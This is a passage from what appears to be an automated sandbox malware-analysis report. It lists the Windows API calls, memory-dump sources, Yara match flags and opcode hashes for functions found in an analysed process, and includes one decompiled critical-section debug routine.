                                            • Instruction Fuzzy Hash: 6B0199B2210108AFCB58CF99DC84EEB77A9AF8C354F158258BA0DA7251C630E851CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00577420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0056CCE0,?,?), ref: 0057745C
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: f3bcaea74ef519ad61b146ddc7849edba13df62b5df8e03d240ae92d31c195b0
                                            • Instruction ID: 617bb9ac171ee2c6de72227761d29b8421d0c8ae5ce2914aa6f7146e11ba42d0
                                            • Opcode Fuzzy Hash: f3bcaea74ef519ad61b146ddc7849edba13df62b5df8e03d240ae92d31c195b0
                                            • Instruction Fuzzy Hash: BDE06D333902043AE7206599BC03FA7B79CAB85B20F154026FA0DEA2C1D595F80152A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00569B23, Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00569BA2
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: df6bbcc5408c720e5448587703f7560b19e1f2f1b3a740f2d51d2111de8e08c9
                                            • Instruction ID: 9e9b152b6948a643b88eeeb8ba276059adb574faa0dcac971e613a579a74eefd
                                            • Opcode Fuzzy Hash: df6bbcc5408c720e5448587703f7560b19e1f2f1b3a740f2d51d2111de8e08c9
                                            • Instruction Fuzzy Hash: 1EF0A0B9E0410AABDB10DF94EC41F9EB778FB81709F108554E9089B240EA31EA419B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00578A31, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0056CFB2,0056CFB2,?,00000000,?,?), ref: 00578A70
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: f03f616a8cff35f8f3f808634bafd1b6a423f0a70d1c236cce045ca7763ef37c
                                            • Instruction ID: 752645a94b953e1fd5a02c1e14c126ade87780e5784282415901f2dd4280cfb7
                                            • Opcode Fuzzy Hash: f03f616a8cff35f8f3f808634bafd1b6a423f0a70d1c236cce045ca7763ef37c
                                            • Instruction Fuzzy Hash: C8E0EDBA2042596FCB00DF61DD85EE73BB8EF85390F248989FC881B602C530A805CBB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00578A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0056CFB2,0056CFB2,?,00000000,?,?), ref: 00578A70
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: db6ee6fb5b52261f208fcd64699ef5f56984637a6ab70b388ed460efba6343d5
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: DBE01AB12002186BDB14DF49DC85EE737ADAF88650F018154BE0C57241C930E810CBF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00569BAB, Relevance: 1.5, APIs: 1, Instructions: 22libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00569BA2
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 5a2e2246cf40888f7dabc2aa92904b70bcfa04eabfb718692e5fe030c72a8af0
                                            • Instruction ID: cd3f7077808be7efe94703925a01d83f76cfd7c65c196e1eaff47c09e2f66b27
                                            • Opcode Fuzzy Hash: 5a2e2246cf40888f7dabc2aa92904b70bcfa04eabfb718692e5fe030c72a8af0
                                            • Instruction Fuzzy Hash: 7DE08670E4410FAFDF10CE94DC41FDDBBB8EB44208F044195E908DB190E630EA4ACB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0056D41A, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,00567C73,?), ref: 0056D44B
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: b379b5418328bfdabb29bdb4d8f0f497723d61803ba31bb09d83291b40827d8c
                                            • Instruction ID: 26e02fd7eaf7782b46a4452c0b2bf7ea3f7b78548df5a528ca4ee7c3ab27a8df
                                            • Opcode Fuzzy Hash: b379b5418328bfdabb29bdb4d8f0f497723d61803ba31bb09d83291b40827d8c
                                            • Instruction Fuzzy Hash: 99D02E217403043BEB00BAA49C03F32369CAB84B04F088024F948A72C3ED60E8008062
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0056D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,00567C73,?), ref: 0056D44B
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                            • Instruction ID: 97667a02613aff0e6310564f6432e6eae6da04a84dedf890a778ae136743e689
                                            • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                            • Instruction Fuzzy Hash: AAD05E617503042AEB10BAA49C07F26768CAB84B10F494064F948972C3E964E9004162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005672F3, Relevance: 1.5, APIs: 1, Instructions: 18threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 005672EB
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 8dd506f5391cdfee15fbff9f8641fa08cd6605b0a9e53971b0082efdbc063c8b
                                            • Instruction ID: 0598f821338f87952dd059e03211ceccc558ef84095ba9aef6029229e018cac3
                                            • Opcode Fuzzy Hash: 8dd506f5391cdfee15fbff9f8641fa08cd6605b0a9e53971b0082efdbc063c8b
                                            • Instruction Fuzzy Hash: 76D02283B1810C1AC6418D8DFC22AF83B98D2B5503F8906BFEA09CA282E905121C6BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0388967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1426ad2883ecd36cd3d067dac858deef5372fbb1b3c29a9f149b9e2377e71421
                                            • Instruction ID: ea5fa9e4071b8bdea3815d7b599202c1f7702a53bdaa507cf844fe123995e696
                                            • Opcode Fuzzy Hash: 1426ad2883ecd36cd3d067dac858deef5372fbb1b3c29a9f149b9e2377e71421
                                            • Instruction Fuzzy Hash: F6B09B719014C5C5EA11E7E04708737790477D0745F1BC0D2D2024751A4778C495F5B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 038DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E038DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0388CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E038D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E038D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x038dfdda
                                            0x038dfde2
                                            0x038dfde5
                                            0x038dfdec
                                            0x038dfdfa
                                            0x038dfdff
                                            0x038dfe0a
                                            0x038dfe0f
                                            0x038dfe17
                                            0x038dfe1e
                                            0x038dfe19
                                            0x038dfe19
                                            0x038dfe19
                                            0x038dfe20
                                            0x038dfe21
                                            0x038dfe22
                                            0x038dfe25
                                            0x038dfe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038DFDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038DFE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038DFE2B
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true
                                            • Associated: 00000007.00000002.934307710.000000000393B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000007.00000002.934319997.000000000393F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 348012486fe8436b300d143ff92180fb8b50ce6f6e983dd9b0bed90b6b69d55c
                                            • Instruction ID: f16d1c4dc1ff27bbaaa56569c4417f62c7a0d665eee5bc4e168b1859a6bb6295
                                            • Opcode Fuzzy Hash: 348012486fe8436b300d143ff92180fb8b50ce6f6e983dd9b0bed90b6b69d55c
                                            • Instruction Fuzzy Hash: 28F0FC36140201BFDA205BC5DC01F23BB5AEB45730F244355F6249A2D1DA62F82096F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%